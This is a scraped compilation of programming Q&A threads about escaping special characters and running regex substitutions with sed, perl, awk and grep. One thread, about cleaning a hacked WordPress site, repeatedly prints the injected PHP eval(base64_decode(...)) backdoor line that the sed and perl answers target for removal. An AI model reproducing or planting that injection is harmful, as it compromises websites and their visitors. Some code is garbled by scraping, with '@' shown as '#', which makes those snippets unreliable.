escape reserved chars from a regexp(sed) parameter - regex

I want to write a script that modifies a variable in a .properties file. The user enters the new value which is in turn written into the file.
read -p "Input Variable?" newVar
sed -r 's/^\s*myvar=.*/myvar=${newVar}/' ./config.properties
Unfortunately problems arise when the user inputs special characters. In my use case it is very likely that a "/" character is typed. So my guess is that I have to parse ${newVar} for all slashes and escape them? But how? Is there a better way?

have a look at bash printf
%q quote the argument in a way that can be reused as shell input
Example:
$ printf "%q" "input with special characters // \\ / \ $ # #"
input\ with\ special\ characters\ //\ \\\ /\ \\\ \$\ #\ #

Avoiding shell quoting is a good general principle.
#! /usr/bin/env perl
use strict;
use warnings;
die "Usage: $0 properties-file ..\n" unless #ARGV;
print "New value for myvar?\n";
chomp(my $new = <STDIN>);
$^I = ".bak";
while (<>) {
s/^(\s*myvar\s*=\s*).*$/$1$new/;
print;
}
Substitution with s/// as above will be familiar to sed users.
The code above uses Perl's in-place editing facility (enabled most commonly with the -i switch but above with the special $^I variable) to modify files named on the command line and create backups with the .bak extension.
Example usage:
$ cat foo.properties
theirvar=123
myvar=FIXME
$ ./prog foo.properties
New value for myvar?
foo\bar
$ cat foo.properties
theirvar=123
myvar=foo\bar
$ cat foo.properties.bak
theirvar=123
myvar=FIXME

Edit: oops, we are only qoting the value, not the regex. So this is what you need
You are better off using perl instead of sed for this if it is available.
read -p "Input Variable?" newVar
perl -i -p -e 'BEGIN{$val=shift;}' \
-e 's/^\s*myvar=.*/myvar=$val/' \
"$newVar" ./config.properties
Edit2: Sorry, still does not handle \ characters in newVar. Guess one of the other solutions is better. As stated before, dealing with shell escaping is your issue.

You are better off using a tool that understands variables -- Perl, maybe AWK -- trying to quote a random string so that you avoid all unintended interactions with sed command parsing is asking for trouble.
Also, you won't get your variable interpolated when using single quotes, and even with -r, sed does not grok Perl regex syntax -- -r only gets you to the egrep version of regexes, so \s doesn't do what you want.
Anyway, ignoring my own advice, here's how we'd do it in the old days before we had those better tools:
read -p "Input Variable?" newVar
sed "/^ *myvar=/c\\
myvar=`echo \"$newVar\" | sed 's/\\\\/\\\\\\\\/'`" ./config.properties
If you don't think your users will figure out how to input literal backslashes at your prompt, you can simplify this to:
read -p "Input Variable?" newVar
sed "/^ *myvar=/c\\
myvar=$newVar" ./config.properties

Related

Using sed with regex to find and replace a string

So I have the following string in my config.fish, and init.vim:
Fish: eval sh ~/.config/fish/colors/base16-monokai.dark.sh
Vim: colorscheme base16-monokai
Vim: let g:airline_theme='base16_monokai'
And I have the following shell script:
#!/bin/sh
theme=$1
background=$2
if [ -z '$theme' ]; then
echo "Please provide a theme name."
else
if [ -z '$background' ]; then
$background = 'dark'
fi
base16-builder -s $theme -t vim -b $background > ~/.config/nvim/colors/base16-$theme.vim &&
base16-builder -s $theme -t shell -b $background > ~/.config/fish/colors/base16-$theme.$background.sh &&
base16-builder -s $theme -t vim-airline -b $background > ~/.vim/plugged/vim-airline-themes/autoload/airline/themes/base16_$theme.vim
sed -i -e 's/foo/eval sh ~/.config/fish/colors/base16-$theme.$background.sh/g' ~/Developer/dotfiles/config.fish
sed -i -e 's/foo/colorscheme base16-$theme/g' ~/Developer/dotfiles/init.vim
sed -i -e 's/foo/let g:airline_theme='base16_$theme'/g' ~/Developer/dotfiles/init.vim
fi
Basically the idea is the script will generate whichever theme is passed through using this builder.
I have tried referring this documentation but I am not very skilled at regex so if anybody could give me a hand I would appreciate it.
What I need to happen is once the script is generated sed will look for the above strings and replace theme with the newly generated theme ones.
Try this :
sed -i "s|\(eval sh ~/\.config/fish/colors/base16-\)\([^.]*\)\.\([^.]*\)\\(.*\)|\1$theme.$background\4|
" ~/Developer/dotfiles/config.fish
sed -i "s/\(base16\)\([-_]\)\([a-zA-Z]*\)/\1\2$theme/g" ~/Developer/dotfiles/init.vim
Assuming in the second sed command that the theme is an alphanumeric string. If not, you can complete the character range : [a-zA-Z] with additional characters (eg [a-zA-Z0-9]).
You can replace something in sed using this syntax: sed "s#regex#replacement#g". Because you have /s and 's in your strings, it's easiest not to need to escape them.
There are some characters that need to be escaped to make the regexes. . and $ need to be escaped with a \. The $ in the replacement string needs to be escaped too.
If you want to capture a certain part from match, it's easiest to use char classes. For example, eval sh ~/\.config/fish/colors/base16-([^.]+)\.dark\.sh would be the regex to use if you want your replacement to be airline_theme='$1_base16_\$theme'. In that case, the $1 in the replacement is the thing captured in the regex.
[^.]+ will capture everything up to the next .
I hope this helps you to better understand regexes! This should be detailed enough to show you how to write your own.
You need to use double quotes for parameter expansion not single quotes.
You need to escape the single quotes: 'hello'\''world'
I will make one line for you and leave it as an exercise to fix the other lines
sed -i -e 's~\(let g:airline_theme='\''\)[^'\'']*\('\'\)'~base16_'"$theme"~' ~/Developer/dotfiles/init.vim
The first character after the s in the sed expression string is used as the pattern separator, so by putting / first you have specified / as the separator.
Additionally using the single quote tells the shell not to expand any variables, you are going to want to use double quotes instead.
try something like
sed -i -e "s#foo#eval sh ~/.config/fish/colors/base16-$theme.$background.sh#g" ~/Developer/dotfiles/config.fish
as you've now commented that you needed to find the previous theme string instead of foo
sed -i -e "s#eval sh \~/\.config/fish/colors/base16-.*?\..*?\.sh#eval sh ~/.config/fish/colors/base16-$theme.$background.sh#g" ~/Developer/dotfiles/config.fish

unmatched parenthesis in regex - Linux

I want to replace (whole string)
$(TOPDIR)/$(OSSCHEMASDIRNAME)
with
/udir/makesh/$(OSSCHEMASDIRNAME)
in a makefile
I tried with
perl -pi.bak -e "s/\$\(TOPDIR\)\/\$\(OSSCHEMASDIRNAME\)/\/udir\/makesh\/\$\(OSSCHEMASDIRNAME\)/g " makefile
but i am getting unmatched parentheses error
You have to "double" escape the dollar sign. Like this:
echo "\$(TOPDIR)/\$(OSSCHEMASDIRNAME)" | perl -p -e "s/\\$\(TOPDIR\)\/\\$\(OSSCHEMASDIRNAME\)/\/udir\/makesh\/\\$\(OSSCHEMASDIRNAME\)/g"
First off, you don't need to use / for regular expressions. They're just canonical. You can use pretty much anything. Thus your code can become (simplify away some \):
perl -pi.bak -e "s|\$\(TOPDIR\)/\$\(OSSCHEMASDIRNAME\)|/udir/makesh/\$\(OSSCHEMASDIRNAME\)|g " makefile
Now to actually address your issue, because you're using " instead of ', the shell attempts to figure out what $\ means which is then replaced with (presumably) nothing. So what you really want is:
perl -p -i.bak -e 's|\$\(TOPDIR\)/\$\(OSSCHEMASDIRNAME\)|/udir/makesh/\$\(OSSCHEMASDIRNAME\)|g' makefile
When in doubt about escaping, you can simply use quotemeta or \Q ... \E.
perl -pe 's#\Q$(TOPDIR)\E(?=/\Q$(OSSCHEMASDIRNAME)\E)#/udir/makesh#;'
Note the use of a look-ahead assertion to save us the trouble of repeating the trailing part in the substitution.
A quotemeta solution would be something like:
perl -pe 'BEGIN { $dir = quotemeta(q#$(TOPDIR)/$(OSSCHEMASDIRNAME)#); }
s#$dir#/udir/makesh/$(OSSCHEMASDIRNAME)#;'
Of course, you don't need to use an actual one-liner. When the shell quoting is causing troubles, the simplest option of them all is to write a small source file for your script:
s#\Q$(TOPDIR)\E(?=/\Q$(OSSCHEMASDIRNAME)\E)#/udir/makesh#;
And run with:
perl -p source.pl inputfile

Command line find a large string and replace on all files in a subdirectory

I've got a hacked wordpress install I'd like to clean up. Every single .php file has had this inserted at the top:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
I'd like to replace that string with nothing in every .php file in the wordpress directory including subs. What's my best option? I've got bash, python, perl, php and so on.
I've tried:
perl -pi -e 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
Bareword found where operator expected at -e line 1, near "s/<?php\ /**/eval"
syntax error at -e line 1, near "s/<?php\ /**/eval"
Identifier too long at -e line 1.
and
sed -i 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
sed: -e expression #1, char 15: unknown option to `s'
#!/usr/bin/perl
use warnings;
use strict;
use File::Find;
# get a list of files
local #ARGV;
find sub {push #ARGV, $File::Find::name if /\.php$/}, '.';
# do in-place editing
$^I = '.bak';
while (<>) {
print unless $_ eq "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>\n";
}
Note that in your base string, you already have the reg-exp delimiter used by default (and you are using) the '/' char in your perl and sed.
You can either escape all those like '\/' OR you can use a different char for the reg-exp delimiter. For sed, try
sed -i 's#<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>##g' *.php
For some seds, you have to 'tell' sed you are changing up. only the initial reg-exp delimiter needs an esacpe char, i.e. sed -k 's\#<....##g' *.php
I hope this helps.
P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, and/or give it a + (or -) as a useful answer.
The problem is that '/' exists in the string you want to match, and you are using '/' as your pattern delimiter. Luckily, Perl allows you to specify alternate delimiters, so use one that is not in the string you are matching:
perl -pn -i.bak -e "s{<?php\ /\*\*/eval\(base64_decode\('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\)\);\ \?>}{}g;" `find . -name '*.php'`
I modified the command a bit. It is always good practice to create backup files when doing in-place edits in case there is an error or you need to verify (via diff) that the command did what you expect (I have a perl program that allows me to easily rename the .bak files back in case I need to reset things).
I also use a find command to get the list of all .php files in and below the current directory. If working in a flat directory, your *.php is sufficient.
You also need to escape regex specials in the string you want to match. Example the '*', '?', and '()' characters need to be escaped.
If the command works as expected, you can run the following command to remove the .bak files:
/bin/rm `find . -name '*.bak'`
find ./*php | xargs -t -i perl -pi -e "s/<\?php\s+\/\*\*\/eval\(base64_decode\(\'\S+\'\)\);\s+\?>//;" {}
Feel free to substitute the ginormous base64 string instead of \S+
Try this:
sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//' *.php
Things I changed:
escaped all regexp symbols in your code (e.g. (, ), * and ?)
replaced ' with '\'' in your code, which is the only way to put a ' in a '-delimited string in bash
If you want to recursively replace *.php even in subdirectories of this directory:
find -print0 | xargs -0 sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//'
Note that I've used -print0 and -0 so it doesn't break with files with spaces.
Here's a bash 4+ script
#!/bin/bash
shopt -s globstar
shopt -s nullglob
for php in **/*.php
do
data=$(<"$php")
a=${data%%<?php*}
echo "$a ${data#*?>}" > t && mv t "$php"
done

Why is sed not recognizing \t as a tab?

sed "s/\(.*\)/\t\1/" $filename > $sedTmpFile && mv $sedTmpFile $filename
I am expecting this sed script to insert a tab in front of every line in $filename however it is not. For some reason it is inserting a t instead.
Not all versions of sed understand \t. Just insert a literal tab instead (press Ctrl-V then Tab).
Using Bash you may insert a TAB character programmatically like so:
TAB=$'\t'
echo 'line' | sed "s/.*/${TAB}&/g"
echo 'line' | sed 's/.*/'"${TAB}"'&/g' # use of Bash string concatenation
#sedit was on the right path, but it's a bit awkward to define a variable.
Solution (bash specific)
The way to do this in bash is to put a dollar sign in front of your single quoted string.
$ echo -e '1\n2\n3'
1
2
3
$ echo -e '1\n2\n3' | sed 's/.*/\t&/g'
t1
t2
t3
$ echo -e '1\n2\n3' | sed $'s/.*/\t&/g'
1
2
3
If your string needs to include variable expansion, you can put quoted strings together like so:
$ timestamp=$(date +%s)
$ echo -e '1\n2\n3' | sed "s/.*/$timestamp"$'\t&/g'
1491237958 1
1491237958 2
1491237958 3
Explanation
In bash $'string' causes "ANSI-C expansion". And that is what most of us expect when we use things like \t, \r, \n, etc. From: https://www.gnu.org/software/bash/manual/html_node/ANSI_002dC-Quoting.html#ANSI_002dC-Quoting
Words of the form $'string' are treated specially. The word expands
to string, with backslash-escaped characters replaced as specified by
the ANSI C standard. Backslash escape sequences, if present, are
decoded...
The expanded result is single-quoted, as if the dollar sign had not
been present.
Solution (if you must avoid bash)
I personally think most efforts to avoid bash are silly because avoiding bashisms does NOT* make your code portable. (Your code will be less brittle if you shebang it to bash -eu than if you try to avoid bash and use sh [unless you are an absolute POSIX ninja].) But rather than have a religious argument about that, I'll just give you the BEST* answer.
$ echo -e '1\n2\n3' | sed "s/.*/$(printf '\t')&/g"
1
2
3
* BEST answer? Yes, because one example of what most anti-bash shell scripters would do wrong in their code is use echo '\t' as in #robrecord's answer. That will work for GNU echo, but not BSD echo. That is explained by The Open Group at http://pubs.opengroup.org/onlinepubs/9699919799/utilities/echo.html#tag_20_37_16 And this is an example of why trying to avoid bashisms usually fail.
I've used something like this with a Bash shell on Ubuntu 12.04 (LTS):
To append a new line with tab,second when first is matched:
sed -i '/first/a \\t second' filename
To replace first with tab,second:
sed -i 's/first/\\t second/g' filename
Use $(echo '\t'). You'll need quotes around the pattern.
Eg. To remove a tab:
sed "s/$(echo '\t')//"
You don't need to use sed to do a substitution when in actual fact, you just want to insert a tab in front of the line. Substitution for this case is an expensive operation as compared to just printing it out, especially when you are working with big files. Its easier to read too as its not regex.
eg using awk
awk '{print "\t"$0}' $filename > temp && mv temp $filename
I used this on Mac:
sed -i '' $'$i\\\n\\\thello\n' filename
Used this link for reference
sed doesn't support \t, nor other escape sequences like \n for that matter. The only way I've found to do it was to actually insert the tab character in the script using sed.
That said, you may want to consider using Perl or Python. Here's a short Python script I wrote that I use for all stream regex'ing:
#!/usr/bin/env python
import sys
import re
def main(args):
if len(args) < 2:
print >> sys.stderr, 'Usage: <search-pattern> <replace-expr>'
raise SystemExit
p = re.compile(args[0], re.MULTILINE | re.DOTALL)
s = sys.stdin.read()
print p.sub(args[1], s),
if __name__ == '__main__':
main(sys.argv[1:])
Instead of BSD sed, i use perl:
ct#MBA45:~$ python -c "print('\t\t\thi')" |perl -0777pe "s/\t/ /g"
hi
I think others have clarified this adequately for other approaches (sed, AWK, etc.). However, my bash-specific answers (tested on macOS High Sierra and CentOS 6/7) follow.
1) If OP wanted to use a search-and-replace method similar to what they originally proposed, then I would suggest using perl for this, as follows. Notes: backslashes before parentheses for regex shouldn't be necessary, and this code line reflects how $1 is better to use than \1 with perl substitution operator (e.g. per Perl 5 documentation).
perl -pe 's/(.*)/\t$1/' $filename > $sedTmpFile && mv $sedTmpFile $filename
2) However, as pointed out by ghostdog74, since the desired operation is actually to simply add a tab at the start of each line before changing the tmp file to the input/target file ($filename), I would recommend perl again but with the following modification(s):
perl -pe 's/^/\t/' $filename > $sedTmpFile && mv $sedTmpFile $filename
## OR
perl -pe $'s/^/\t/' $filename > $sedTmpFile && mv $sedTmpFile $filename
3) Of course, the tmp file is superfluous, so it's better to just do everything 'in place' (adding -i flag) and simplify things to a more elegant one-liner with
perl -i -pe $'s/^/\t/' $filename
TAB=$(printf '\t')
sed "s/${TAB}//g" input_file
It works for me on Red Hat, which will remove tabs from the input file.
If you know that certain characters are not used, you can translate "\t" into something else.
cat my_file | tr "\t" "," | sed "s/(.*)/,\1/"

Using regular expressions in shell script

What is the correct way to parse a string using regular expressions in a linux shell script? I wrote the following script to print my SO rep on the console using curl and sed (not solely because I'm rep-crazy - I'm trying to learn some shell scripting and regex before switching to linux).
json=$(curl -s http://stackoverflow.com/users/flair/165297.json)
echo $json | sed 's/.*"reputation":"\([0-9,]\{1,\}\)".*/\1/' | sed s/,//
But somehow I feel that sed is not the proper tool to use here. I heard that grep is all about regex and explored it a bit. But apparently it prints the whole line whenever a match is found - I am trying to extract a number from a single line of text. Here is a downsized version of the string that I'm working on (returned by curl).
{"displayName":"Amarghosh","reputation":"2,737","badgeHtml":"\u003cspan title=\"1 silver badge\"\u003e\u003cspan class=\"badge2\"\u003e●\u003c/span\u003e\u003cspan class=\"badgecount\"\u003e1\u003c/span\u003e\u003c/span\u003e"}
I guess my questions are:
What is the correct way to parse a string using regular expressions in a linux shell script?
Is sed the right thing to use here?
Could this be done using grep?
Is there any other command that's more easier/appropriate?
The grep command will select the desired line(s) from many but it will not directly manipulate the line. For that, you use sed in a pipeline:
someCommand | grep 'Amarghosh' | sed -e 's/foo/bar/g'
Alternatively, awk (or perl if available) can be used. It's a far more powerful text processing tool than sed in my opinion.
someCommand | awk '/Amarghosh/ { do something }'
For simple text manipulations, just stick with the grep/sed combo. When you need more complicated processing, move on up to awk or perl.
My first thought is to just use:
echo '{"displayName":"Amarghosh","reputation":"2,737","badgeHtml"'
| sed -e 's/.*tion":"//' -e 's/".*//' -e 's/,//g'
which keeps the number of sed processes to one (you can give multiple commands with -e).
You may be interested in using Perl for such tasks. As a demonstration, here is a Perl script which prints the number you want:
#!/usr/local/bin/perl
use warnings;
use strict;
use LWP::Simple;
use JSON;
my $url = "http://stackoverflow.com/users/flair/165297.json";
my $flair = get ($url);
my $parsed = from_json ($flair);
print "$parsed->{reputation}\n";
This script requires you to install the JSON module, which you can do with just the command cpan JSON.
For working with JSON in shell script, use jsawk which like awk, but for JSON.
json=$(curl -s http://stackoverflow.com/users/flair/165297.json)
echo $json | jsawk 'return this.reputation' # 2,747
My proposition:
$ echo $json | sed 's/,//g;s/^.*reputation...\([0-9]*\).*$/\1/'
I put two commands in sed argument:
s/,//g is used to remove all commas, in particular the ones that are present in the reputation value.
s/^.*reputation...\([0-9]*\).*$/\1/ locates the reputation value in the line and replaces the whole line by that value.
In this particular case, I find that sed provides the most compact command without loss of readability.
Other tools for manipulating strings (not only regex) include:
grep, awk, perl mentioned in most of other answers
tr for replacing characters
cut, paste for handling multicolumn inputs
bash itself with its rich $(...) syntax for accessing variables
tail, head for keeping last or first lines of a file
sed is appropriate, but you'll spawn a new process for every sed you use (which may be too heavyweight in more complex scenarios). grep is not really appropriate. It's a search tool that uses regexps to find lines of interest.
Perl is one appropriate solution here, being a shell scripting language with powerful regexp features. It'll do most everything you need without spawning out to separate processes (unlike normal Unix shell scripting) and has a huge library of additional functions.
You can do it with grep. There is -o switch in grep witch extract only matching string not whole line.
$ echo $json | grep -o '"reputation":"[0-9,]\+"' | grep -o '[0-9,]\+'
2,747
1) What is the correct way to parse a string using regular expressions in a linux shell script?
Tools that include regular expression capabilities include sed, grep, awk, Perl, Python, to mention a few. Even newer version of Bash have regex capabilities. All you need to do is look up the docs on how to use them.
2) Is sed the right thing to use here?
It can be, but not necessary.
3) Could this be done using grep?
Yes it can. you will just construct similar regex as you would if you use sed, or others. Note that grep just does what it does, and if you want to modify any files, it will not do it for you.
4) Is there any other command that's easier/more appropriate?
Of course. regex can be powerful, but its not necessarily the best tool to use everytime. It also depends on what you mean by "easier/appropriate".
The other method to use with minimal fuss on regex is using the fields/delimiter approach. you look for patterns that can be "splitted". for eg, in your case(i have downloaded the 165297.json file instead of using curl..(but its the same)
awk 'BEGIN{
FS="reputation" # split on the word "reputation"
}
{
m=split($2,a,"\",\"") # field 2 will contain the value you want plus the rest
# Then split on ":" and save to array "a"
gsub(/[:\",]/,"",a[1]) # now, get rid of the redundant characters
print a[1]
}' 165297.json
output:
$ ./shell.sh
2747
sed is a perfectly valid command for your task, but it may not be the only one.
grep may be useful too, but as you say it prints the whole line. It's most useful for filtering the lines of a multi-line file, and discarding the lines you don't want.
Efficient shell scripts can use a combination of commands (not just the two you mentioned), exploiting the talents of each.
Blindly:
echo $json | awk -F\" '{print $8}'
Similar (the field separator can be a regex):
awk -F'{"|":"|","|"}' '{print $5}'
Smarter (look for the key and print its value):
awk -F'{"|":"|","|"}' '{for(i=2; i<=NF; i+=2) if ($i == "reputation") print $(i+1)}'
You can use a proper library (as others noted):
E:\Home> perl -MLWP::Simple -MJSON -e "print from_json(get 'http://stackoverflow.com/users/flair/165297.json')->{reputation}"
or
$ perl -MLWP::Simple -MJSON -e 'print from_json(get "http://stackoverflow.com/users/flair/165297.json")->{reputation}, "\n"'
depending on OS/shell combination.
Simple RegEx via Shell
Disregarding the specific code in question, there may be times when you want to do a quick regex replace-all from stdin to stdout using shell, in a simple way, using a string syntax similar to JavaScript.
Below are some examples for anyone looking for a way to do this. Perl is a better bet on Mac since it lacks some sed options. If you want to get stdin as a variable you can use MY_VAR=$(cat);.
echo 'text' | perl -pe 's/search/replace/g'; # using perl
echo 'text' | sed -e 's/search/replace/g'; # using sed
And here's an example of a custom, reusable regex function. Arguments are source string (or -- for stdin), search, replace, and options.
regex() {
case "$#" in
( '0' ) exit 1 ;; ( '1' ) echo "$1"; exit 0 ;;
( '2' ) REP='' ;; ( '3' ) REP="$3"; OPT='' ;;
( * ) REP="$3"; OPT="$4" ;;
esac
TXT="$1"; SRCH="$2";
if [ "$1" = "--" ]; then [ ! -t 0 ] && read -r TXT; fi
echo "$TXT" | perl -pe 's/'"$SRCH"'/'"$REP"'/'"$OPT";
}
echo 'text' | regex -- search replace g;